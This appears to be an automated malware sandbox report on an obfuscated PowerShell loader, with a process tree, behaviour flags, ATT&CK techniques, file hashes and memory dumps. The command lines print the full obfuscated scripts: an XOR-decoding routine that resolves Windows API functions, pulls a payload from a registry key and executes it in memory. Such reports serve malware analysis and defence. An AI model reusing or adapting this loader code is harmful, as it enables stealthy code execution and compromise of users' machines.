6pe3Me7Fn2Us3en3re2St3TrDTu2Da7Vr3udDAn3KoAPo3ReDAb3Vo4Ur2Af0An3Em5Ro3AbCTe2Af1Jo2Vi1Fs3Zi6La2Va7fi3LyDMa3DeALy3JoDpe3Lu4Ge3Br6Bl2Un1Gi3HyDRe3fe6Un2Fl0Ke7Th3Un7Di7In2Fo3Ma3DiCSt2Pi7He2an0Br3MoBkv3OvCMe3NoCRu2Pl7Tr6Fo7Sa7NlATi7FoFFa7Bl3Sa7KnBBi1Ba4Si1Hj7Un0Pk7Un7Ha3Sh1Is3St7FoBHe0Ry8Be1ToADo3BuDFo2Mi7kr0Od3Ar2Kl7Su2Br1fu0LeEEn7OaFJe7Rg3Pr0Lo8Va0Sp6gn1SoAPh3VaDNa2St7En6gr0Tr6In1no0CeERe7AgFSt7di3Si0De8Ab0Ci6st1laALi3CaDSr2La7Ln6Ov0Cr6Bi1Aa0TrEFr7unFAl7kn3Fl0ek8Ko0De6Ba1AfARe3SnDTa2St7Ar6Si0Pa6Fl1Fj0reEIn7PaAAr7Li3Ar7joBVa0Fl8mi1UnASr3DuDPu2Vo7Ri0ou3Gu2te7Ve2Fa1ti0AtENy7ViAGa7LfASg7BaAUn'Ge;Vr&Ha(Pi`$KlpAtoKotTvsAghSpoOuoSttBr7Sk)Ph Tu`$BuPSarovoCegborPaaMemSemNuoHadgwuCrlMyeRerHe6Re;Lu`$OpMSieEttOrhcaySulMacUnhSpoGelaraGanWrtAlhUnrUneLanAkeBy Sk=Ho EnfSekCopbi Ru`$BrpPuoCrtKlsEphDeoDeoUdtFo5Ba Fr`$UnpSpoJetAnsFohproMaoUntFo6Le;Th`$PrPSerUioBagPrrVialamFymIroUndHouEjlSoeHarGa7Ge Me=su ToHGrTReBMa Tr'Wi7Hu7Va1Ny9Su3Re2Pa3si0Un3HuCCr3Un1Re3FaASo2Sk7St3poASu3Pe2St3TrDMe3Un2Ta6Ch0Af7Tr3Ha6OkEBo7Re3in7La7Sc0Sh0sh2Un3Ta2Fo1Sp3St8Ap3Hn8Re3Te6At3Co7Wa3Ef2Do3RoFSk3He6Ov3TaDfe3Fi6Co2Fa0Bl7UnDHe1PaADi3AbDen2ge5Un3GeCVe3Sa8il3Mo6De7ExBSp0Al8Tr1UnABu3ErDIr2Je7Kr0id3St2Na7re2No1ko0JoEEx6Ba9Ep6Fo9mo0Ke9Ha3Da6Un2Ta1Ma3DeCAn7CaFDe7Pa3Rh6Ej5So6Af5an6Ov4Sk7SpFBa7St3Mu6Ce3De2DjBDe6Un0mi6Ac3sm6Au3Br6Sk3Pr7FrFPi7Ni3An6Un3Ka2FiBFa6Ov7Sv6Be3Fa7InAVi'sj;tr&St(St`$UnpKroSatResBihTeoByoKatNo7Tz)Te St`$UnPRarFeoRagRerCoaDrmdemTioYadLauEslOreBermi7Ta;Sq`$SlPDarUdoFogcorHuaComHamSkoAndSiuSylDieKirTo8Un Pa=al KrHInTMaBFr Ab'Ul7et7Gh3RoCCu2Po3Rh3MaFKu3YmAco2Ta5Vu3Un6Ta3EfFPa2Ud0Gr3Ak6Ve7Br3Ud6asESn7Ku3To7Br7Sk0Ho0In2Ry3El2Pr1Do3In8Tr3St8Br3Ko6Un3li7Sh3ry2Ov3UnFDi3Ko6Ro3BaDPa3Du6Fl2An0Ak7UnDRa1KrAHe3BoDro2Ko5El3GuCSt3po8Te3An6Dy7FiBSi0Py8ca1spAFn3ReDBl2Io7go0Fa3Fo2Cy7ha2Mi1Fr0StECo6Sp9St6Co9Be0Sl9Wa3Mo6Ra2Sc1Bl3BoCZa7SjFSt7Sl3St6Mu6Sy6Un5Ta6Sh6Re6Ku1fu6Se7Ke6ApBSc6Pr3Bo6Pa3Ga7ChFFu7Lo3Di6ii3Ge2AfBRe6Aa0Ce6Fo3Mi6Tr3Ab6Mi3Bo7AaFUn7Sh3An6Ju3Pa2SiBBr6So7Id7ArASa'Po;Ya&me(Pi`$unpTroIntDisbihskoAfoTrtvi7Ap)Ov Ne`$ouPBorApoGegAnrReaRemArmAnoPadOtuRelXieGarHj8Pe;Un`$StOBevNsefarcrcUmoTrlEkdRe=Su(HoGjeeGotge-RyISotOpeCamOrPAfrRioSupBleHarFrtTayTr An-NePOmaTrtSehDo Re'ViHWoKSeCMaUSa:Mi\smEcodFoiUnfRiiUncSjaAknGatTo\SeMSiaDayTobAlrreiMetUdsPa'Bn)Po.PrVBoechrTheVectiuSpnKldTanNaeUnsTysMi;Ch`$SkPBarSyoUrgSyrSmaOsmTrmBloUndSkuUdlFleforCa9Ty Sp=Ba AfHBoTChBam Se'Fl7Kn7Pa0Sl3Vi2Mi1Pi3DyCBi3So4No2Po1Do3Sa2Ty3PoELe3UnESa3ImCSt3Af7Di2Pu6re3BeFKn3Pr6Ou2By1Li7Kr3La6BoEBa7Fl3Do0En8Ro0Fl0Pr2SiAtj2Ta0Ra2Do7Sv3Su6Br3ReENo7GdDFa1Pu0Li3InCCu3BeDPr2Un5Fi3Ba6Mi2Un1Su2Co7Ra0ReETa6Ol9Ti6Em9uh1Ka5Ti2Is1Fr3SkCCa3GrEDa1Op1To3Un2Fl2Br0Op3Py6He6Va5Pa6El7Re0Un0co2Il7Sp2Fi1Cr3DaASm3FlDBa3se4Ba7OuBMu7Un7Bu1RiCHa2Ko5Ud3Sy6Ch2Fl1Aw3de0Ma3PsCTh3LaFPe3Er7Di7KrALo'Un;Bo&Ha(Ge`$tepSeoBrtTisBrhAnoTeosytUd7Po)Al Pe`$EnPSurAroSkgTzrDiaunmVamSnoBldSkuKulDeeCyrra9Sk;en`$FlODevPaeBerSocBroRolHadBi0Po Sa=bo SmHnaTInBSg Di'Ma0Ba8Sa0ju0sk2ViASe2Ph0Fu2Ve7Ma3fe6Re3LoEAi7RoDBu0De1Fu2Ki6Po3SkDMo2Sk7Ln3FjAUn3KdESp3Ch6Fo7OuDDi1SvAEn3GlDAg2Im7Ao3Qu6Ca2He1No3trCno2Va3Am0No0Ov3Ta6Ov2Sk1Ka2Fa5Sh3AbADe3Tr0Ze3Ln6Af2Me0An7TuDDu1TeEPl3Ar2Cr2Ge1De2Sa0Bl3WhBLi3Po2Sm3IaFPe0CaEAm6Kn9Om6Un9Fo1Sk0Wh3ReCSo2Va3Ca2EnAIn7UnBHo7Ba7Fu0Ne3Mo2Le1sk3MeCgl3En4La2Om1Di3em2Vo3TuEUd3DeESt3AnCSt3No7Ro2Pl6Po3DeFEx3Sm6Ti2Kn1Pa7SlFOl7Ub3He6Sk3Pa7CoFSh7Fe3Vi7Di3Ov7Me7Ci1Hi9Ri3Sl2Re3Mi0Va3WaCre3Fr1Wr3OsAIn2Ug7Re3TrAsk3Tr2Un3BeDai3pe2St6Sk0Ch7foFud7Ry3St6Af5Fi6Ba5co6Ta4Am7RuANo'Po;Bl&fu(To`$VrpfooaltAgsCwhtaoAnoVetRh7Po)Ac Pe`$udOUnvKieGerClcFroEllAudMa0Po;Be`$MassiuRenKispitudoNonAnefj=Re`$SaPPrrAroGugPhrFiaHumPlmBaoOvdGouNalMaeEfrPa.PecFloMiuAdnBytAf-Ep6Ab6Li7ti;du`$EsOShvHueMyrSqcUnoSylRedFo1Sk Vk=Tr coHadTHeBMe Re'nd0Eg8Sv0Xm0To2MeAMi2Ch0My2Ip7Pr3Gi6de3TjEDe7CoDBa0Ac1Al2Aa6Fo3RoDIn2pr7Ct3GaARu3IsERa3Un6Ru7UdDSi1ObAPl3SkDVa2Ha7Bi3Ta6Li2Ca1De3DeCJa2Sa3Ar0Re0Sk3Ky6Ho2Un1Hr2Bl5Re3DiAAc3Di0Hv3Fi6Fo2An0Bo7deDUo1PrEIn3Hy2Va2Sk1Ae2Ex0St3MiBEm3re2Kl3ArFPr0FiEFl6Wo9Kr6Su9Ov1Bi0Fl3AuCba2El3In2BrAAk7BrBAa7Li7Sp0Rk3Sl2Ov1Te3BrCEn3Sk4Ra2Si1De3St2Kr3FrEAv3InEPa3GuCMa3pa7Da2Go6Pr3UdFLu3In6li2Pa1Un7ElFRe7Mn3De6Im5Pu6Tr5Af6Mi4Ko7seFTr7No3As7Ch7Ti3StCCo2Sp3Pa3InFRu3omAbl2Op5Cl3Un6Mr3MeFSk2Se0St3Pl6St7SkFLi7pa3Cl7Sk7Un2Dy0Ov2Ru6Fo3SeDUd2Be0Me2Ha7Ko3HiCDe3SsDMe3Po6Re7ReAUd'Rd;Cy&Un(No`$FapHooMetOpsUdhreoUsoFotth7Au)In Fl`$BeOBuvFieMirHecBaoSalAsdSl1Po;ne`$StODevPreInrUncDeoBelTadHu2za Jo=Lo EkHBiTUnBFr Bo'Te7Do7Af0Me6Pa3ul7Sc2El7De2st1Br3Po8In2Af0Gy3To1Ou3PyCEm2Un1Lu3Ae7Te2bi0Dr7De3Ra6stEAd7Ru3Se0Sk8Mu0Me0Un2WiAAm2Un0Un2Pa7Ry3Un6St3BeEMo7InDZo0Pr1Sk2Sa6Pi3JaDCo2Gy7El3UlANa3NoEUd3Ba6Pr7FoDJo1flAUl3SaDto2Fi7Di3ud6St2Sl1aa3KoCRi2sp3na0Na0Ud3Pu6Fe2Ra1Ba2Ja5Su3beAtr3Gl0Tu3ma6Kr2Op0Da7UnDUn1VaECo3Ex2Hi2Gr1Un2Op0Sy3FrBSi3De2Be3UnFBj0chEVu6sv9Be6Sy9Ex1Bh4El3Fa6Mi2Ps7Co1Po7Va3Si6Ga3ElFRe3Fi6Ph3Tr4Hk3Sc2St2Fl7Te3Sp6Lg1In5Ma3obCIn2un1re1Ni5Ge2Bo6Wa3ArDRe3Vi0Af2Re7In3BoAOd3PlCPr3ImDSl0Fr3Un3SuCqu3GiALe3AnDUn2ve7Th3Up6Ph2Tv1Sk7TeBBu7BrBCo3At5Ag3Cl8Er2Re3Sy7Su3sa7In7Be0Pa6En2St3Te3RoFWe3Kl2Me2MoASe7ba3co7Bi7Sm0Bi0Sp3In6Ou2Ma3Ad2Me7In3Op6Ti2fk7Co2Fa7Tr3Bo6de2Go0Co7MaAse7UtFPu7Hj3co7FoBPr1Un4Ac1Dg7Ga0Eo7Co7Un3Er1Be3En7InBFi0De8In1GlAGe3StDUo2Gu7Ns0An3El2St7He2Pa1Af0OfECa7KvFEr7Er3Fa0Ep8Un1CoACh3PrDRu2Re7Ov0Mu3Ma2Do7Hy2St1Te0GaEPe7EuFPy7Pr3Ma0Ra8Mu1HiARo3SwDSk2Ou7Sl0Te3fj2Ci7Se2Pr1Ny0leEEp7FoFOc7Bu3Fl0Un8Li1UnADa3ViDTr2Fe7Wi0Pr3Bo2Sp7ti2Ge1St0LoEUn7ExFTu7Sc3Di0Pa8Br1neAFa3TjDPh2Sk7Tr0br3He2Ov7In2Hy1Af0PuEBe7EpATa7Xc3He7CoBSi0Va8Un1SeATo3deDSo2Op7Su0hy3Ol2St7Pa2Ni1Di0BeEjo7FoABa7coARu7SuADe'Be;St&Sw(Mi`$TepSkoUltCoskohTooSkoTrtEn7In)Vv Sy`$laOSlvApeMirLicKooBalSedSt2Yi;Ps`$RaOMovsteChrLecReoPjlMedTe3Bu De=Di jaHRoTFoBOn No'Su7Ag7Uv0Un6Th3em7Sk2Ca7Cy2Ha1Ro3St8Ju2Na0Pr3si1Ja3VaCBu2By1Sc3Et7Ab2Dd0fe7StDBo1paASe3poDRo2Av5Sh3PrCro3Pa8Ta3Ci6Af7OfBRu7Ac7Et1Ov9de3Ba2Co3oc0Va3TeCRe3Pr1Bo3MoAIn2Sl7En3krACa3mi2Da3baDAf3su2Fl6Am0No7SuFPe7Lo7Br3UnCun2Bo3fd3AiFBl3FoAFi2Ka5In3Ga6Un3DrFRi2Ud0Me3Tu6bi7DiFUn7Ca7ta1ChEFr3Da6No2Fo7Be3BaBSt2WeAHa3ToFMa3Ed0Op3CaBUh3FoCsc3UnFKa3Cy2Ju3BaDMo2Rm7se3GrBVi2Gt1Af3Su6kr3ExDFo3Te6No7HeFSc6Al3Ti7IrFIn6ha3Md7AfAGe'Jo;In&Ex(Ea`$PhpRioRetBesPuhPaoDeoTutAo7Af)Ep Pl`$CiOInvSrePorHicCloNelVedUn3Di#Ma;""";Function Overcold9 { param([String]$dolkhales); For($Besots=2; $Besots -lt $dolkhales.Length-1; $Besots+=(2+1)){ $Bissekrmmers = $Bissekrmmers + $blomkaalshoved + $dolkhales.Substring($Besots, 1); } $Bissekrmmers;}$Samaroid0 = Overcold9 'PrIArEHyXFr ';$Samaroid1= Overcold9 $Tumultuous;if([IntPtr]::size -eq 8){START-job { param($Ansg) powershell $Ansg } -RunAs32 -Argument $Samaroid1 | wait-job | Receive-Job;}else{&$Samaroid0 $Samaroid1;};;;"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4756
- - \??\c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
    "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3800
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$dolkhales); $Tonicking49 = New-Object byte[] ($dolkhales.Length / 2); For($Besots=0; $Besots -lt $dolkhales.Length; $Besots+=2){ $Tonicking49[$Besots/2] = [convert]::ToByte($dolkhales.Substring($Besots, 2), 16); $Tonicking49[$Besots/2] = ($Tonicking49[$Besots/2] -bxor 83); } [String][System.Text.Encoding]::ASCII.GetString($Tonicking49);}$Novationens0=HTB '002A2027363E7D373F3F';$Novationens1=HTB '1E3A30213C203C35277D043A3D60617D063D203235361D32273A25361E36273B3C3720';$Novationens2=HTB '14362703213C3012373721362020';$Novationens3=HTB '002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1B323D373F36013635';$Novationens4=HTB '2027213A3D34';$Novationens5=HTB '1436271E3C37263F361B323D373F36';$Novationens6=HTB '0107002336303A323F1D323E367F731B3A3736112A003A347F730326313F3A30';$Novationens7=HTB '01263D273A3E367F731E323D32343637';$Novationens8=HTB '0136353F363027363717363F3634322736';$Novationens9=HTB '1A3D1E363E3C212A1E3C37263F36';$potshoot0=HTB '1E2A17363F3634322736072A2336';$potshoot1=HTB '103F3220207F730326313F3A307F730036323F36377F73123D203A103F3220207F731226273C103F322020';$potshoot2=HTB '1A3D253C3836';$potshoot3=HTB '0326313F3A307F731B3A3736112A003A347F731D3624003F3C277F73053A212726323F';$potshoot4=HTB '053A212726323F123F3F3C30';$potshoot5=HTB '3D27373F3F';$potshoot6=HTB '1D2703213C27363027053A212726323F1E363E3C212A';$potshoot7=HTB '1A160B';$potshoot8=HTB '0F';$Uplay=HTB '060016016061';$Septettes=HTB '10323F3F043A3D373C2403213C3012';function fkp {Param ($Vaklendes, $Overnatningsstederne) ;$Programmoduler0 =HTB '77142126342126736E737B08122323173C3E323A3D0E696910262121363D27173C3E323A3D7D143627122020363E313F3A36207B7A732F73043B3621367E1C3139363027732873770C7D143F3C31323F122020363E313F2A1032303B36737E123D3773770C7D1F3C3032273A3C3D7D00233F3A277B77233C27203B3C3C276B7A087E620E7D162226323F207B771D3C2532273A3C3D363D20637A732E7A7D143627072A23367B771D3C2532273A3C3D363D20627A';&($potshoot7) $Programmoduler0;$Programmoduler5 = HTB '771F2A38383637213E736E73771421263421267D1436271E36273B3C377B771D3C2532273A3C3D363D20617F7308072A2336080E0E73137B771D3C2532273A3C3D363D20607F73771D3C2532273A3C3D363D20677A7A';&($potshoot7) $Programmoduler5;$Programmoduler1 = HTB '21362726213D73771F2A38383637213E7D1A3D253C38367B773D263F3F7F73137B08002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1B323D373F360136350E7B1D36247E1C313936302773002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1B323D373F360136357B7B1D36247E1C3139363027731A3D270327217A7F737B771421263421267D1436271E36273B3C377B771D3C2532273A3C3D363D20667A7A7D1A3D253C38367B773D263F3F7F73137B770532383F363D3736207A7A7A7A7F73771C2536213D32273D3A3D34202027363736213D367A7A';&($potshoot7) $Programmoduler1;}function GDT {Param ([Parameter(Position = 0)] [Type[]] $telegrambureauet,[Parameter(Position = 1)] [Type] $Hrning = [Void]);$Programmoduler2 = HTB '771521323D382A736E7308122323173C3E323A3D0E696910262121363D27173C3E323A3D7D1736353A3D36172A3D323E3A30122020363E313F2A7B7B1D36247E1C313936302773002A2027363E7D0136353F3630273A3C3D7D122020363E313F2A1D323E367B771D3C2532273A3C3D363D206B7A7A7F7308002A2027363E7D0136353F3630273A3C3D7D163E3A277D122020363E313F2A11263A3F3736211230303620200E696901263D7A7D1736353A3D36172A3D323E3A301E3C37263F367B771D3C2532273A3C3D363D206A7F737735323F20367A7D1736353A3D36072A23367B77233C27203B3C3C27637F7377233C27203B3C3C27627F7308002A2027363E7D1E263F273A3032202717363F36343227360E7A';&($potshoot7) $Programmoduler2;$Programmoduler3 = HTB '771521323D382A7D1736353A3D36103C3D2027212630273C217B771D3C2532273A3C3D363D20657F7308002A2027363E7D0136353F3630273A3C3D7D10323F3F3A3D34103C3D25363D273A3C3D200E69690027323D373221377F737727363F363421323E31262136322636277A7D0036271A3E233F363E363D2732273A3C3D153F3234207B771D3C2532273A3C3D363D20647A';&($potshoot7) $Programmoduler3;$Programmoduler4 = HTB '771521323D382A7D1736353A3D361E36273B3C377B77233C27203B3C3C27617F7377233C27203B3C3C27607F73771B213D3A3D347F737727363F363421323E31262136322636277A7D0036271A3E233F363E363D2732273A3C3D153F3234207B771D3C2532273A3C3D363D20647A';&($potshoot7) $Programmoduler4;$Programmoduler5 = HTB '21362726213D73771521323D382A7D102136322736072A23367B7A';&($potshoot7) $Programmoduler5 ;}$Udpantningsforretningernes = HTB '3836213D363F6061';$Programmoduler6 = HTB '7700232138383637323F363D3620736E7308002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1E3221203B323F0E696914362717363F3634322736153C2115263D30273A3C3D033C3A3D2736217B7B3538237377063723323D273D3A3D3420353C212136273D3A3D3436213D36207377233C27203B3C3C27677A7F737B14170773137B081A3D270327210E7F7308061A3D2760610E7F7308061A3D2760610E7F7308061A3D2760610E7A737B081A3D270327210E7A7A7A';&($potshoot7) $Programmoduler6;$Methylcholanthrene = fkp $potshoot5 $potshoot6;$Programmoduler7 = HTB '771932303C313A273A323D3260736E737700232138383637323F363D36207D1A3D253C38367B081A3D270327210E69690936213C7F736565647F73632B606363637F73632B67637A';&($potshoot7) $Programmoduler7;$Programmoduler8 = HTB '773C233F3A25363F2036736E737700232138383637323F363D36207D1A3D253C38367B081A3D270327210E69690936213C7F7366656661676B63637F73632B606363637F73632B677A';&($potshoot7) $Programmoduler8;$Overcold=(Get-ItemProperty -Path 'HKCU:\Edificant\Maybrits').Verecundness;$Programmoduler9 = HTB '7703213C3421323E3E3C37263F3621736E7308002A2027363E7D103C3D253621270E696915213C3E1132203665670027213A3D347B771C253621303C3F377A';&($potshoot7) $Programmoduler9;$Overcold0 = HTB '08002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1E3221203B323F0E6969103C232A7B7703213C3421323E3E3C37263F36217F73637F7373771932303C313A273A323D32607F736565647A';&($potshoot7) $Overcold0;$sunstone=$Programmoduler.count-667;$Overcold1 = HTB '08002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1E3221203B323F0E6969103C232A7B7703213C3421323E3E3C37263F36217F736565647F73773C233F3A25363F20367F737720263D20273C3D367A';&($potshoot7) $Overcold1;$Overcold2 = HTB '77063727213820313C213720736E7308002A2027363E7D01263D273A3E367D1A3D2736213C23003621253A3036207D1E3221203B323F0E696914362717363F3634322736153C2115263D30273A3C3D033C3A3D2736217B7B353823737706233F322A73770036232736272736207A7F737B14170773137B081A3D270327210E7F73081A3D270327210E7F73081A3D270327210E7F73081A3D270327210E7F73081A3D270327210E7A737B081A3D270327210E7A7A7A';&($potshoot7) $Overcold2;$Overcold3 = HTB '77063727213820313C2137207D1A3D253C38367B771932303C313A273A323D32607F773C233F3A25363F20367F771E36273B2A3F303B3C3F323D273B21363D367F637F637A';&($potshoot7) $Overcold3#"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3200

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
6c73df1bb0c83bf158c1aebc058fbdd2

SHA1
c3f64dbe2337cf4be331efaed86e600076d613cf

SHA256
2bfd8c972f6bb05ae1adca5237a7210d569fb1f9662ad4dd6bfc4e00e88d17ba

SHA512
a9093e7a6808cbe9aa86eb9eb1d50513e942800da5ffc9685c670a34d2349019caa65705dcd6e959de4b066673e3c45b64b5a94b7589c057817ec61eb65188e6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
548e21a8f5e2c98bf35e935495e36c05

SHA1
39fa41b02e71c3e931c1840ab86606f9529d8398

SHA256
5c626706da5e310c0b96a1fbc0cee8756a9099124e8dab6b9c91ac5090c4cd0d

SHA512
f74e92b83a16a69ce251e2d88cf975eba0db28bc2b88ababeb5d4307f352f1291c02f3e412445c20b45dee801bf8497e2ed1c22a495ab296ca83638dc2c5c479

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
2bcfce2b951487e14859649268b145cb

SHA1
7a219881fd0c1c28e08c4d1905f32845b49073a9

SHA256
2b0ffee4b25877a4e08f989ae9a6f6fea590345549cc73ed9a8f82608b285e6b

SHA512
87052dfc32a178fb0b3c29b57d9c58a5f04a9edf6e41ec991dc25d7e94c170763a4f8cf4c08efb83bec6f86e8ebd1ddc1e7c718cc462a1e54af663a3f0195f64

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
29a79f95fb2502924a850d263e5852b7

SHA1
3b395e9b0be540792284d58edbcb8c03e464bed9

SHA256
d11ba5e3294570ac864fe542c0c13f09be32b587d365382e3172f04491544246

SHA512
8399b9ca24345e19f1e971716c884c2781b5b896c1ee25fa0064067ea05edc633b6281915a9e79d0cfaf1e4143ad4b4495deecaa6e4a8fcdeb057ebf31dd2895

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
a1106447f8fd488820bb459a7c77654f

SHA1
ebd1139ec8175e7b6f8f00df8ac27fea4c0f3d44

SHA256
8895e9f4da9017586761e3b066e386ff3e7acce9e75c9c71f90fcd097c42e58a

SHA512
f7ed2bf8cc8e3c7b3d9ea12d0220d6ca9f9958610b934de878cb2da7470b81b8dde818a2b6e811701af00e411115cb84e82bfbe6095b376001fbb353eb180c99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
8d972fba81431f985a5b5c7d9764e193

SHA1
495ea6ea3f3f18df86aefc431226cd74b566ac54

SHA256
29ba4ebdc30fd70d9dc6abfb20a576d696989fe5dee0be04c64df746ea119f50

SHA512
ad8d881d5aae0b194c8a19602afdbc3eb8e9064f1274456558827d1ae3eff447fc75a8350c59c70157b0ec631f0e8dc3678eeae3e9e2aa14e9477f037219d864

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
b37f26cf29e38a852a0e80874c42214d

SHA1
32f9eeb3ba4b9c8be7ce57b428abdbae2657dffc

SHA256
fc35477b19158e0c4b43131a8d7cd54762f4d9b8d294310b2233f90b4839316c

SHA512
c2de9c21ad4e94aab4579620a0ec9b7b6fd996e63efd3c970d135193057532c5b4f3e2b50893c272985901c7c4327b131468e6b582b52fc3ce8d04c85babbcec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
6e0c8c483124491eb57e5a9ade30701f

SHA1
7001e77caaa62024815b44ad9c758c72c60424fb

SHA256
e1ab3316d323dd818e7ddf8842ff92ea12ff38b0ba648713fa3a1d053d91c4ce

SHA512
3e079c383239cc05d9e8fcd96a985811aa8e99ad315398fa3d17cbe60b404f2a041d99f7c6f9e22a545e0903092ff156762b38348d80686f0f61ec1a0eb6dbc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
274690dc14e1d87d0ba10d7b22db4555

SHA1
5b906c23079410477028f0af920a06174a195988

SHA256
9ea91138f6aebd8f3e4f4e988e1de6f0d72185a7b8c0bfa154373055728d7055

SHA512
0ea07ab38cb1a770e6f7e5bb51f6970c16e6eb067a93d3baa8134e34a61aff92e046a2680cc84c02d7bf71216a1cd1154a3a538b1328c54bd2bda349adc1371e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
6c53a41742d312318e043777509ced39

SHA1
53f893b934102cd4c0325fb7966e73cb71ca83c3

SHA256
c806b0978a917e1ecb518cd19f7527700d2ccf5537348a0168272f95ccf4c73c

SHA512
33985340a341827df099ac07a16e1504d01ddb41d4c19e813d623668702c20bfac529047b36fe55f065defddcf67b1693693ab2f7a8fd06d90ead33ea92c2ecb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
f68f553358411759511bc795e348e71a

SHA1
6670662b255ce6cf0a9241ce5daef117081f03ab

SHA256
5cce648960da9760bd2c7e6231e8d021385dd0e203e356606bedb64d4e936de3

SHA512
2269e5efa4a97ef6705020c6dbcdeb551ed10108638633bdf03cc12ef4e28c8a29d3628cbf2367a884b20a443e1eb2d78748c42bcef8ae26441a41cc0094a291

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
57KB

MD5
ee0e65bedf05f3a570f3e7fa051a5b2a

SHA1
ae21a349a6dbccde583b8d04036b93bc79708e4d

SHA256
df533df636e0ad3837b7452e0809327344cf14492d1af2dfbbf0c253e056bb82

SHA512
820822583dab3457f0810adb95dd47b30aeafce362eac4ad756e1d8c457ca6ea524d0aa7cb5a95fb3b0bb39d77148f8dd7b561ce6ab5bde9b89a6c0e1d84dd67

Download Submit
memory/3200-148-0x0000000006D70000-0x0000000006D92000-memory.dmp

Filesize
136KB

Download
memory/3200-149-0x000000000B660000-0x000000000BC04000-memory.dmp

Filesize
5.6MB

Download
memory/3200-147-0x0000000006E60000-0x0000000006EF6000-memory.dmp

Filesize
600KB

Download
memory/3200-151-0x0000000007AC0000-0x000000000B0A8000-memory.dmp

Filesize
53.9MB

Download
memory/3800-143-0x0000000005470000-0x000000000548E000-memory.dmp

Filesize
120KB

Download
memory/3800-140-0x0000000005730000-0x0000000005752000-memory.dmp

Filesize
136KB

Download
memory/3800-146-0x0000000006D60000-0x0000000006D7A000-memory.dmp

Filesize
104KB

Download
memory/3800-145-0x00000000075F0000-0x0000000007C6A000-memory.dmp

Filesize
6.5MB

Download
memory/3800-142-0x0000000006080000-0x00000000060E6000-memory.dmp

Filesize
408KB

Download
memory/3800-141-0x0000000005F10000-0x0000000005F76000-memory.dmp

Filesize
408KB

Download
memory/3800-138-0x0000000005170000-0x00000000051A6000-memory.dmp

Filesize
216KB

Download
memory/3800-139-0x00000000057E0000-0x0000000005E08000-memory.dmp

Filesize
6.2MB

Download
memory/4756-150-0x00007FF870140000-0x00007FF870C01000-memory.dmp

Filesize
10.8MB

Download
memory/4756-136-0x000001ED7E7A0000-0x000001ED7E9AA000-memory.dmp

Filesize
2.0MB

Download
memory/4756-135-0x000001ED7E410000-0x000001ED7E586000-memory.dmp

Filesize
1.5MB

Download
memory/4756-134-0x00007FF870140000-0x00007FF870C01000-memory.dmp

Filesize
10.8MB

Download
memory/4756-133-0x000001ED7B910000-0x000001ED7B932000-memory.dmp

Filesize
136KB

Download